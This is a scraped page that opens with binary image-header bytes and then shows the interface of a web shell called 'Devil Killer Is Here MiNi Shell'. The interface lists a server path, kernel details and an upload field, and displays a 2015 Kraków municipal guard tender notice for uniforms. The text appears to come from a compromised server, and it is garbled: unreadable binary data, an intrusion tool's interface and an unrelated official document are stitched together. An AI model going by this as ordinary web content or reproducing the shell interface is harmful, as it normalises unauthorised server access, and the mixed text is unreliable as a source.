JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150415/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150415/52923-N-2015.html

<p class="kh_header"><b>Kraków: Dostawa elementów umundurowania II</b><br>
<b>Numer ogłoszenia: 52923 - 2015; data zamieszczenia: 15.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Straż Miejska Miasta Krakowa , ul. Dobrego Pasterza 116, 31-416 Kraków, woj. małopolskie, tel. 12 68 82 154, faks 12 68 82 292.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.krakow.pl/?bip_id=33&mmi=11723</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa elementów umundurowania II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa elementów umundurowania, wykonanych wg wzorów określonych w rozporządzeniu Rady Ministrów z dnia 28 lipca 1998 r. w sprawie umundurowania, legitymacji, dystynkcji i znaków identyfikacyjnych strażników gminnych (miejskich) (Dz. U. z 1998 r., Nr 112 poz. 713 z późn. zm.) oraz zgodnych ze wzorami umundurowania używanymi przez Straż Miejską Miasta Krakowa. Rozmiary dla poszczególnych części zamówienia zostaną ustalone z wybranym Wykonawcą po zawarciu umowy. Na Wykonawcy ciąży wykazanie, że oferowane elementy umundurowania są zgodne ze Specyfikacją Istotnych Warunków Zamówienia, dlatego też przedmiot zamówienia powinien być zaopatrzony w odpowiednie metki z opisem składu użytych materiałów lub do oferty powinna być dołączona oddzielna informacja Wykonawcy w tym zakresie, np. odpowiedni atest lub certyfikat.
Użyta nazwa orzeł stylizowany w SIWZ oznacza stylizowany wizerunek orła określony w załączniku nr 5 rozporządzenia Rady Ministrów z dnia 28 lipca 1998 r. w sprawie umundurowania, legitymacji, dystynkcji i znaków identyfikacyjnych strażników gminnych (miejskich).
Wzory przysłane wraz z ofertą przetargową Wykonawcy, muszą być zgodne ze wzorami umundurowania używanymi przez Straż Miejską Miasta Krakowa. Oferty nie odpowiadające tym warunkom, zostaną odrzucone jako niezgodne z SIWZ. Obowiązujące wzory zostaną udostępnione zainteresowanym Wykonawcom w siedzibie Zamawiającego w godz. od 9:00 do 15:00 lub w formie fotografii wybranych elementów umundurowania mogą zostać przesłane drogą elektroniczną.
 
Część 1- mundur tzw. polowy (komplet - kurtka + spodnie)   -  43 kpl.
Oznaczenie przedmiotu zamówienia wg CPV 35.81.20.00-9
Kurtka wykonana z materiału o składzie: bawełna - 50%, poliester - 50%. Materiał nie może ulegać odbarwieniom pod wpływem prania, czyszczenia i warunków atmosferycznych (wymagany atest), w kolorze ciemnogranatowym o widocznym splocie w kratkę tzw. rip-stop Krój prosty, tylna część kurtki krótsza 
od przedniej o 2 cm, przedzielone po bokach rozcięciem na wysokość 5/7 cm. Przód zapinany na zamek błyskawiczny żyłkowy, kryty plisą szer. 5 cm, krojoną w całości z przodem,  plisa zapinana na rzepy. Przy szyi stójka przedłużana z lewej strony z możliwością zapięcia jej rzepem oraz odgięciem na stójkę, również zapinanym na rzep. Wysokość stójki z tyłu i z boku  6 do 6,5 cm, a z przodu 5 do 5,5cm. Z przodu po obu stronach, na wysokości 15 do 15,5 cm od ramienia naszyte skośnie, nakładane kieszenie o wymiarach 17 cm szer. x 16 cm wys., zapinane  na zamek błyskawiczny żyłkowy, kryty plisą szer. min. 1 cm i nie więcej niż 1,5  cm Nad lewą kieszenią napis w kolorze srebrnym Straż Miejska z literą Ż na żółtym odblaskowym tle. 
Wysokość liter min. 2,5 cm. Na lewej kieszeni, centralnie (w pionie) należy wszyć rzep miękki w kolorze czarnym,  o wymiarze 7,5 cm szer. x 8,5 cm wys., celem dopinania haftowanych znaków identyfikacyjnych. 
Z przodu po obu stronach, na wysokości 24 do 26 cm od góry przy obłożeniu (wszycie stójki) po jednej kieszeni ciętej, zapinanej na zamek błyskawiczny żyłkowy długości 16 cm. Przody bluzy (kurtki) z podwójnej tkaniny
do wysokości zakrywającej wszystkie kieszenie. Zakończenie przestębnowane. Z tyłu bluzy do wysokości pasa, fałdy  (o głębokości 3 cm zaszyte od góry 4 cm) umożliwiające swobodę ruchu. Na plecach napis w kolorze srebrnym Straż Miejska z literą Ż na żółtym odblaskowym tle. Wysokość liter min. 5 cm. 
Po środku tyłu szew pionowy dopasowujący bluzę do talii. Rękawy proste dwuczęściowe, zwężające się ku dołowi, zakończone patką zapinaną na rzep, 
z możliwością regulacji obwodu. Rzepy mają być wszyte na całej powierzchni patki (zgodnie z jej kształtem) i na całej szerokości mankietu W górnej części rękawa na wysokości 3 cm od góry (wszycie ramienia) naszyte skośnie kieszenie nakładane 
o wymiarach 17 cm szer. x 16 cm wys., zapinane patką na rzep o wysokości 6 do 6,5 cm., o ściętych rogach. 
Na kieszeniach naszyte emblematy Straży Miejskiej Miasta Krakowa, które zostaną dostarczone przez Zamawiającego. Na łokciach wzmocnienia naszyte z tej samej tkaniny co bluza. Pagony na ramionach zapinane na rzep. Maksymalna długość pagonów 15 cm, szerokość przy podstawie 5 cm, zakończone ściętymi bokami, 
w kształcie litery V. Rzepy i zamki błyskawiczne żyłkowe w kolorze czarnym. Pod pachami od 4 do 6 otworów wentylacyjnych, wykończonych obwódką metalową w kolorze czarnym lub srebrnym.
Spodnie wykonane z materiału o składzie: bawełna - 50%, poliester - 50% w kolorze ciemnogranatowym 
o widocznym splocie w kratkę tzw. rip-stop. Materiał nie może ulegać odbarwieniom pod wpływem prania, czyszczenia i warunków atmosferycznych (wymagany atest). Krój prosty, kieszenie w karczkach biodrowych. 
Z tyłu dwie cięte kieszenie z patkami o wym. 6 cm wys. x 14 cm szer. Po bokach na wysokości 21-23 cm od góry po jednej nakładanej kieszeni o wymiarach 19 cm szer. x 21 cm  wys., z trzema fałdami zaprasowanymi na bok oraz zapinana patką na rzep o ściętych rogach, o wymiarach 19 cm szer. x 6 cm wys. Pasek krojony w całości 
ze spodniami, podszyty obłożeniem. Na nim 7 podtrzymywaczy (szlufek) z taśmy rypsowej o szer. 2 cm 
i wys. 6 do 7 cm oraz klamerki regulujące obwód pasa również na rypsowych paskach. Na wysokości kolan na przodzie po 4 zaszewki (głębokość 1 cm),  rozmieszczone po dwie na boku zewnętrznym i wewnętrznym. 
Pod kolanami wzmocnienie o wysokości 25 cm. Dół nogawki o szerokości  20 cm (40 cm obwód).
termin dostawy: do 45 dni od daty zawarcia umowy

- spodnie długie do munduru tzw. polowego                -  42 szt. 
Oznaczenie przedmiotu zamówienia wg CPV 35.81.20.00-9
Spodnie wykonane z materiału o składzie: bawełna - 50%, poliester - 50% w kolorze ciemnogranatowym o widocznym splocie w kratkę tzw. rip-stop. Materiał nie może ulegać odbarwieniom pod wpływem prania, czyszczenia i warunków atmosferycznych (wymagany atest).Krój prosty, kieszenie w karczkach biodrowych. 
Z tyłu dwie cięte kieszenie z patkami o wym. 6 cm wys. x 14 cm szer. Po bokach na wysokości 21-23 cm od góry po jednej nakładanej kieszeni o wymiarach 19 cm szer. x 21 cm  wys., z trzema fałdami zaprasowanymi na bok oraz zapinana patką na rzep o ściętych rogach, o wymiarach 19 cm szer. x 6 cm wys. Pasek krojony w całości 
ze spodniami, podszyty obłożeniem. Na nim 7 podtrzymywaczy (szlufek) z taśmy rypsowej o szer. 2 cm i wys. 6 do 7 cm oraz klamerki regulujące obwód pasa również na rypsowych paskach. Na wysokości kolan na przodzie po 4 zaszewki (głębokość 1 cm),  rozmieszczone po dwie na boku zewnętrznym i wewnętrznym. 
Pod kolanami wzmocnienie o wysokości 25 cm. Dół nogawki o szerokości  20 cm (40 cm obwód).
termin dostawy: do 45 dni od daty zawarcia umowy

Część 2		   		
- marynarka dwurzędowa                          -  3 szt. 
Oznaczenie przedmiotu zamówienia wg CPV 18.23.00.00-0
Marynarka dwurzędowa w kolorze ciemnogranatowym: materiał - elanowełna o gramaturze od 450 do 480g/mb (przy szerokości tkaniny 142 cm), 45% wełny, 55% elany (? 1%), rodzaj splotu - gabardyna, zapinana na guziki metalowe w kolorze żółtym z orłem stylizowanym, kieszeń wewnętrzna, dwie kieszenie zewnętrzne wpuszczane z patką, na lewej piersi kieszeń cięta z wypustką (butonierka), z otworem wykonanym na środku, do przypięcia znaku identyfikacyjnego, pagony zapinane na guziki metalowe w kolorze żółtym 
z orłem stylizowanym.
W cenie należy uwzględnić koszt naszycia emblematów, które zostaną przekazane przez Zamawiającego wybranemu w trybie przetargu Wykonawcy. 
termin dostawy: do 45 dni od daty zawarcia umowy
  
- marynarka (jednorzędowa)                         -  1 szt. 
Oznaczenie przedmiotu zamówienia wg CPV 18.23.00.00-0
Marynarka jednorzędowa w kolorze ciemnogranatowym: materiał - gabardyna o gramaturze od 480 do 500g/mb (przy szerokości tkaniny 142 cm), 45% wełny, 55% elany (? 1%), zapinana na guziki metalowe w kolorze żółtym z orłem stylizowanym, krój klasyczny, dopasowana w talii, 4 kieszenie z kontrfałdą i patkami, na lewej górnej kieszeni w odległości 3 cm od dolnej krawędzi kieszeni dodatkowy mały guzik 
w kolorze czarnym na środku kontrfałdy, w podszewce dwie kieszenie wewnętrzne, pagony zapinane na guziki metalowe w kolorze żółtym z orłem stylizowanym.
W cenie należy uwzględnić koszt naszycia emblematów, które zostaną przekazane przez Zamawiającego wybranemu w trybie przetargu Wykonawcy. 
termin dostawy: do 45 dni od daty zawarcia umowy
      
Część 3
- identyfikator imienny		    -  6 szt. 
Oznaczenie przedmiotu zamówienia wg CPV 18.42.00.00-9
Wykonany z mosiądzu o grubości 0,8 mm, napis obejmujący pierwszą literę imienia z kropką i nazwisko funkcjonariusza - grawerowany chemicznie, polerowany, rogi zaokrąglone, zabezpieczony lakierem bezbarwnym; wysokość liter 6 mm, wymiary: długość 70 lub 80 mm, szerokość 15 mm, zapięcie agrafkowe.
termin dostawy: do 45 dni od daty zawarcia umowy
      
- spinka do krawata 		    -  32 szt.
Oznaczenie przedmiotu zamówienia wg CPV 18.42.00.00-9
Wykonana z mosiądzu o grubości 1 mm, grawerowana chemicznie bez koloru, polerowana; wysokość liter 4 mm; napis wyśrodkowany: STRAŻ MIEJSKA z literą Ż. Długość spinki maksymalnie 65 mm, szerokość 
7 mm.
termin dostawy: do 45 dni od daty zawarcia umowy
      
      
Część 4 - sznur galowy koloru żółtego	 - 80 szt. 
Oznaczenie przedmiotu zamówienia wg CPV 18.42.00.00-9
Sznur galowy - pojedynczy sznur w kształcie pętli, przewieszony przez ramię pod naramiennikiem i ułożony pionowo pod pachą rękawa; spleciony w formie warkocza z jednym pojedynczym sznurkiem umieszczonym równolegle pod warkoczem, zakończony metalowym wisiorkiem z wizerunkiem orła, (nazywanym zwyczajowo buławą).
termin dostawy: do 45 dni od daty zawarcia umowy
      
Wykonawca winien udzielić pełnej (materiały i robocizna) gwarancji na wyroby będące
przedmiotem zamówienia na okres minimum 12 miesięcy.
Wybrani w części 1 i 2 Wykonawcy, będą zobowiązani do dokonania pomiarów indywidualnych w siedzibie Zamawiającego w uzgodnionym terminie.
Elementy umundurowania, do których należy przyszyć emblematy, mają zostać dostarczone przez Wykonawcę w stanie gotowym do użytku. Emblematy do przyszycia dostarczy Zamawiający.
W cenie należy uwzględnić koszt naszycia emblematów oraz ich wysyłki przez Zamawiającego, do Wykonawcy, który zostanie wybrany w trybie przetargu.
Do oferty należy dołączyć wzory oferowanych elementów umundurowania. 
(Załączone wzory będą zwrócone po zakończeniu postępowania zgodnie z art. 97 ust. 2 ustawy).   
Do części 1 i 2 należy dołączyć próbki materiału z atestem (świadectwem jakości) lub innymi dokumentami z ich opisem o składzie.
Zamawiający dopuszcza składanie ofert częściowych, jednak będą brane pod uwagę jedynie takie oferty, w których Wykonawca zaproponuje realizację zamówienia dla całej części, tj. dla wszystkich pozycji w tej części..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 35.81.20.00-9, 18.23.00.00-0, 18.42.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> dla części 1 zamówienia 350,00 zł (trzysta pięćdziesiąt  złotych 00/100)
dla części 2 zamówienia 50,00 zł (pięćdziesiąt złotych 00/100)
dla części 3  zamówienia 10,00 zł (dziesięć złotych 00/100)
dla części 4  zamówienia 100,00 zł (sto złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi metodą spełnia/nie spełnia na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych 
w art. 22 ust. 1 ustawy, zgodnie z załącznikiem nr 3 do SIWZ. 
Oprócz oświadczenia, dla oceny warunku wiedzy i doświadczenia 
Wykonawcy, wymagane jest załączenie do oferty wykazu, co najmniej jednej dostawy elementów umundurowania, odpowiadającej przedmiotowi zamówienia, wykonanej w okresie ostatnich trzech lat, wraz z podaniem wartości, przedmiotu, daty zrealizowania oraz podmiotów, na rzecz których dostawa została wykonana. Wykonawca zobowiązany jest dołączyć dowód, że dostawa została wykonana należycie (np. referencje, faktury, protokoły odbioru, itp.). Wykaz może obejmować aktualnie realizowane dostawy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 ustawy, zgodnie z załącznikiem nr 3 do SIWZ. Zamawiający dokona oceny spełnienia ww. warunków przez Wykonawców na podstawie analizy załączonych dokumentów i oświadczeń metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych              w art. 22 ust. 1 ustawy, zgodnie z załącznikiem nr 3 do SIWZ. Zamawiający dokona oceny spełnienia ww. warunków przez Wykonawców na podstawie analizy załączonych dokumentów i oświadczeń metodą spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 ustawy, zgodnie z załącznikiem nr 3 do SIWZ. Zamawiający dokona oceny spełnienia ww. warunków przez Wykonawców na podstawie analizy załączonych dokumentów i oświadczeń metodą spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy dołączyć wzory oferowanych elementów umundurowania. 
(Załączone wzory będą zwrócone po zakończeniu postępowania zgodnie z art. 97 ust. 2 ustawy). Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 45</li>
<li>2 - Jakość - 45</li>
<li>3 - Gwarancja - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Będą to zmiany wynikające z następujących przesłanek:a) przekształcenie formalno-prawne którejkolwiek ze Stron umowy; b) zmian adresowych którejkolwiek ze Stron umowy; c) zaistnienie innych okoliczności niezależnych od Wykonawcy, których
nie można było przewidzieć w dniu zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.krakow.pl/?bip_id=33&mmi=11723<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Straż Miejska Miasta Krakowa, 31-416 Kraków, ul. Dobrego Pasterza 116.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2015 godzina 10:00, miejsce: Straż Miejska Miasta Krakowa, 31-416 Kraków, ul. Dobrego Pasterza 116.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> mundur tzw.polowy (komplet - kurtka + spodnie) oraz spodnie długie do munduru tzw. polowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> mundur tzw. polowy (komplet - kurtka + spodnie)   -  43 kpl.              
Kurtka wykonana z materiału o składzie: bawełna - 50%, poliester - 50%. Materiał nie może ulegać odbarwieniom pod wpływem prania, czyszczenia i warunków atmosferycznych (wymagany atest), w kolorze ciemnogranatowym o widocznym splocie w kratkę tzw. rip-stop Krój prosty, tylna część kurtki krótsza od przedniej 
o 2 cm, przedzielone po bokach rozcięciem na wysokość 5/7 cm. Przód zapinany na zamek błyskawiczny żyłkowy, kryty plisą szer. 5 cm, krojoną w całości z przodem,  plisa zapinana na rzepy. Przy szyi stójka przedłużana z lewej strony z możliwością zapięcia jej rzepem oraz odgięciem na stójkę, również zapinanym na rzep. Wysokość stójki z tyłu i z boku  6 do 6,5 cm, a z przodu 5 do 5,5cm. Z przodu po obu stronach, na wysokości 15 do 15,5 cm od ramienia naszyte skośnie, nakładane kieszenie o wymiarach 17 cm szer. x 16 cm wys., zapinane  na zamek błyskawiczny żyłkowy, kryty plisą szer. min. 1 cm i nie więcej niż 1,5  cm Nad lewą kieszenią napis w kolorze srebrnym Straż Miejska z literą Ż na żółtym odblaskowym tle. 
Wysokość liter min. 2,5 cm. Na lewej kieszeni, centralnie (w pionie) należy wszyć rzep miękki w kolorze czarnym,  o wymiarze 7,5 cm szer. x 8,5 cm wys., celem dopinania haftowanych znaków identyfikacyjnych. 
